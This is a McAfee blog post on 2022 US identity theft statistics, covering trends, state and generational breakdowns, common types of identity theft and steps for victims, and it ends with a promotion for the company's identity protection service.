These statistics only scratch the surface, though. Keep reading to learn more about the latest identity theft data and what you can do to protect your personal information.  

How common is identity theft in the U.S.?

Identity theft is a huge issue in the United States, and it doesn’t seem to be going away anytime soon. Fraud reports show that the number of identity thefts in the U.S. continues to grow and grow. The graph below shows the number of identity theft reports from the first quarter of 2017 to the first quarter of 2021.  

The reported instances of identity theft have risen sharply from just over 100,000 in the first quarter of 2017 to well over 500,000 in the first quarter of 2021. 2020 had the sharpest increase in reports, as cybercriminals did their best to capitalize on the pandemic to take people’s government benefits 

Number of Identity Theft Reports from 2017-2021

Identity theft, by state  

Not every state is affected by ID theft equally. Where you live can have a big impact on your likelihood of experiencing identity theft. The graph below shows the amount of identity theft cases reported to the FTC per 100,000 residents for each state in the U.S.  

States with the Highest Rates of Identity Theft

With a closer look, the five states with the most identity theft reports include Georgia, Louisiana, Illinois, Kansas, and Rhode Island, which takes the top spot. The number of reports in Rhode Island more than doubled in 2021, from 1,191 in 2020 to 2,857.  

At the other end of the spectrum, South Dakota remained the state with the lowest occurrence of identity theft, with only 76 residents per 100,000 experiencing it.  

State Rankings by Identity Theft

Here’s a list of the 20 metro cities where you have the highest chance of having your identity stolen. 

Top 20 Metro Areas With the Most Identity Theft

Who are the victims of identity theft?

Anyone can become the victim of identity theft, in large part because so much of our information is online. However, certain age groups are more likely to experience different types of scams 

For example, baby boomers are more likely than Generation Z to benefit from government programs. This makes them more susceptible to scams like benefits fraud (where a criminal poses as someone else to steal government benefits).  

On the other hand, younger generations like millennials have grown up with the internet, and activities like shopping online are more frequent. This makes them more susceptible to identity theft through credit card fraud 

Here’s a breakdown of the most common identity theft types from various generations:  

Number of Reports By Generation

Types of identity theft

There are several different types of identity theft, ranging from stolen financial information to compromised health care data. Some forms are pretty straightforward. For instance, credit card fraud occurs when somebody steals your credit card number and uses it to buy things. Others, like medical identity theft, might be a bit harder to recognize.  

Here’s a list of five of the most common types of identity theft 

  • Financial identity theft: This form of identity theft is exactly what it sounds like and involves a criminal stealing your financial information. For instance, your credit card number can be stolen and used to make a purchase.  
  • Medical identity theft: With medical identity theft, someone steals your personal information to obtain health care services. An example is someone else using your identity to obtain prescription drugs. 
  • Criminal identity theft: This form of identity theft occurs when someone else uses your name when arrested. You’ll know this has happened to you if you receive a court summons, for instance, that you had no involvement with. 
  • Synthetic identity theft: A rising form of identity theft, synthetic identity theft is when someone creates a fake identity using someone’s real information. For instance, an imposter might create a fake identity using someone else’s real birthdate and Social Security number to apply for a loan. 
  • Child identity theft: With child identity theft, a criminal uses a minor’s personal information to commit bank fraud or another form of identity theft. 

Although these are five of the most common types of identity theft, they can serve as umbrella terms for more specific forms of fraud. The diagram below shows the number of reported fraud cases of these various types of identity theft In 2021. 

Most Reported Forms of Identity Theft in 2021

While the internet has made our day-to-day lives more convenient, it’s also made it much easier for scammers to steal our personal information. Identity theft has become increasingly more common in the United States over the past five years.  

The more you use the internet, the more opportunities scammers have to steal your data and sell it on places like the dark web. Social media platforms, e-commerce businesses, banking companies, and a host of other online businesses can store your information for a variety of reasons.  

If you use the internet for online shopping, for instance, there’s a good chance a large number of databases stored your personal and financial data. While businesses use your information to give you a better online experience, scammers can also access it to steal your identity.  

The graph below shows the growth of different types of identity theft from 2017 to 2021.  

Type of Identity Theft Trends 2017-2021

What should I do if I think I’m a victim of identity theft?

Criminals use many tricks to get your information. Scammers or hackers might send phishing emails pretending to be the IRS, snoop around social media pages for password clues, get info through a data breach, or simply buy information on the dark web 

Here are a few things you can do if you believe you are the victim of identity theft 

  • Be on the lookout: To avoid identity theft, you’ll want to be alert for signs that someone has stolen your identity. Check your bank statement and credit report regularly to ensure no extra charges to your account. Pay attention to red flags like bills that arrive at your home with your information but someone else’s name, mysterious calls from debt collectors, or emails from new accounts for online services you don’t remember starting.  
  • Reach out to local law enforcement: Some banks may make you show them a police report before they reimburse you for any fraudulent charges or withdrawals. 
  • Contact the company where your ID is being used: Let the businesses where your information is being used know what’s happened. For instance, you’ll want to contact your bank and cancel your credit cards if you find out a criminal is using them. 
  • Get in touch with the three big credit bureaus: Call or message TransUnion, Equifax, and Experian right away. They may be able to diminish the impact an identity thief has on your credit score.  
  • File a report with the FTC: Reporting identity fraud to the FTC can help spread awareness of scams and identity theft tactics so others don’t fall victim to them.  
  • Visit the Identity Theft Resource Center: The ITRC has tools and information to help you protect yourself against identity theft and recover from it.  

We’re here to help protect your personal information

The internet makes our lives easier in many ways. Although identity theft is rising, you shouldn’t let online scams prevent you from enjoying these digital conveniences. Identity thieves are an unavoidable part of using the internet, but you can greatly limit your risk of falling victim to cybercrime if you know what to watch out for and you’re smart online.  

Recognizing the signs of identity theft can help you stay ahead of fraudsters, and investing in McAfee Identity Protection services can offer another layer of protection. When you sign up for our identity protection services, you get perks like $1 million in identity theft protection insurance and email address and bank account monitoring. With our help, you can continue to use the internet with confidence. 

The post A Guide to Identity Theft Statistics for 2022 appeared first on McAfee Blog.

]]>